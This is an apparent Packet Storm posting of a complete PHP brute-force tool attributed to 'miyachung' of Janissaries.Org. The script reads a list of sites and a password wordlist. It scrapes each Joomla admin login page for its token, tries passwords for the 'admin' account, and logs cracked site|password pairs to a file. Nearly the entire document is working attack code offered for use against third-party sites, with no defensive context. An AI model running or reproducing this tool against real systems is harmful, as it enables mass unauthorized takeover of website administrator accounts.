Joomla Admin Panel Bruteforcer

[bc-vnt]

This is a php script that takes a list of sites and password possibilities and runs as a cracker against Joomla administrative panels.

<?php
set_time_limit(0);
/*
* 		Joomla Brute Forcer
* 		Coded by miyachung
*		miyachung@hotmail.com
* 		Janissaries.Org
* 		Special Thanks burtay
*		Usage-> php Bruter.php SITELIST PASSWORDS
*		Example-> php Bruter.php SITES.txt PASSWORDS.txt
*/


class jom
{

		public  $sites;
		public  $wordlist;
		private $user			= "admin";
		private $regex   		= "/([0-9a-f]{32})/si";
		private $timeout 		= 7;
		private $cookie_file	= "cookie.jani";
		private $log_file		= "cracks.txt";

    private function save_File($content)
	{
		$fp = fopen($this->log_file,'ab');
		fwrite($fp,$content);
		fclose($fp);
		if($fp)
		{
			return true;
		}
		else
		{
			return false;
		}
	}
	private function get_Hash($site)
	{
		$curl = curl_init();
		curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
		curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
		curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file);
		curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
		$play = curl_exec($curl);
		curl_close($curl);
		if(preg_match('#value="com_login"#si',$play))
		{
			preg_match($this->regex,$play,$hash);
			return $hash[1];
		}
		else
		{
			echo "[-]Hash not found,passing site\n";
			return false;
		}
	}
	private function tryPassword($site,$password,$hash)
	{
		$curl = curl_init();
		curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
		curl_setopt($curl,CURLOPT_POST,TRUE);
		curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
		curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
		curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file);
		curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
		curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."?=&option=com_login&task=login&".$hash."=1");
		$play = curl_exec($curl);
		curl_close($curl);
		return $play;
	}
	public function bruter()
	{
		$sites = explode("\n",file_get_contents($this->sites));

		foreach($sites as $site)
		{
			if(!preg_match('#http#si',$site)) $site = "http://".$site;
			$site	=	trim($site);
			echo "\n[+]$site\n";
			$hash 	= $this->get_Hash($site);
			if(!$hash){continue;}
			echo "[+]$hash\n";

			$wordlist = explode("\n",file_get_contents($this->wordlist));
			foreach($wordlist as $password)
			{
			$try	=	$this->tryPassword($site,trim($password),$hash);
			if(preg_match("/com_config/si",$try))
			{
				echo "\n\t[*]Password cracked-> ".$password."\n";
				echo "\t[*]Saved to the log file\n";
				$this->save_File("$site|$password\r\n");
				break;
			}

			}
		}
	}
}

if(!$argv[1] || !$argv[2])
{
	echo "################################################\n";
	echo "\t\tJoomla Brute Forcer\n";
	echo "\t\tCoded By miyachung\n";
	echo "\t\tJanissaries.Org\n";	
	echo "################################################\n";
	echo "\n[-]Missing arguments\n";
	exit;
}
elseif(!file_exists($argv[1]) OR !file_exists($argv[2]))
{
	echo "################################################\n";
	echo "\t\tJoomla Brute Forcer\n";
	echo "\t\tCoded By miyachung\n";
	echo "\t\tJanissaries.Org\n";	
	echo "################################################\n";
	echo "\n[-]File not found\n";
	exit;
}
else
{
	echo "################################################\n";
	echo "\t\tJoomla Brute Forcer\n";
	echo "\t\tCoded By miyachung\n";
	echo "\t\tJanissaries.Org\n";	
	echo "################################################\n";

	$jom 			= new jom;
	$jom->sites 	= $argv[1];
	$jom->wordlist 	= $argv[2];
	$jom->bruter();
}

?>

http://packetstormsecurity.org/files/115088/Joomla-Admin-Panel-Bruteforcer.html